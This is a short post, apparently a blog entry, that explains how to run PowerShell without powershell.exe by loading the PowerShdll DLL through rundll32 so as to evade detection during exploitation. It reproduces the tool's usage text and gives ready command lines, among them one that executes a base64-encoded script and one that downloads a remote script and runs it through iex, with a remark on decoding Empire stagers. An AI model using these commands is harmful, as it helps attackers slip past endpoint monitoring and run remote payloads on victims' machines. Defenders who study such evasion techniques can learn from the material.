Using powershell without powershell.exe
Ever wondered how to evade "powershell.exe" during exploitations?
Well use thze powershell.ddll instead.
p3nt4 gives some advice on his github page.
dll mode: Rundll32:
Usage:
rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -h Display this message
rundll32 PowerShdll,main -f <path> Run the script passed as argument
rundll32 PowerShdll,main -w Start an interactive console in a new window (Default)
rundll32 PowerShdll,main -i Start an interactive console in this console
If you do not have an interractive console, use -n to avoid crashes on outputExamplesRun base64 encoded scriptrundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex
Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode
Download and run scriptrundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;